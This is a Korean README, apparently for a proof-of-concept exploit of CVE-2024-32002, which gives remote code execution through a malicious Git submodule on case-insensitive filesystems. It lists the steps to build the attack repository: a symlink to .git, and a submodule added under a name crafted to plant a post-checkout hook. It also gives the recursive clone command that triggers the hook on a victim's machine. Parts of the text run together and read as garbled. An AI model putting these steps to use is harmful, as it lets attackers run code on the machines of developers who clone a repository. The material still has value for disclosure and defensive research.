
CVE-2024-32002에 대한 개념 증명 익스플로잇으로, 대소문자 구분 없는 파일시스템에서 악의적인 Git 서브모듈을 통해 원격 코드 실행을 시연합니다.
CVE-2024-32002의 PoC로, 원격 코드 실행(RCE)을 시연합니다.
관련 서브모듈 저장소는 cve-2024-32002-poc-rce에서 확인하세요.
.git 디렉터리를 가리키는 임의의 이름을 가진 심볼릭 링크..gitmodules 파일.이 저장소는 Linux(WSL2, 정확히는)에서 생성되었습니다. 악성 저장소는 대소문자 구분 파일 시스템에서만 생성할 수 있다는 점이 중요합니다.
ln -s .git submodule
참고:
.git 폴더를 가리켜야 합니다. 파일을 쓰고자 하는 대상이기 때문입니다.git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
참고:
hooks/post-checkout을 포함하는 디렉터리 이름과 일치해야 합니다. cve-2024-32002-poc-rce를 참조하세요..git 디렉터리 내에서 서브모듈의 git 상태를 추적하는 경로 이름과 일치합니다.이 취약점은 Windows와 macOS에만 영향을 미칩니다. 두 운영체제 모두 대소문자 구분이 없는 파일 시스템을 사용하기 때문입니다.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git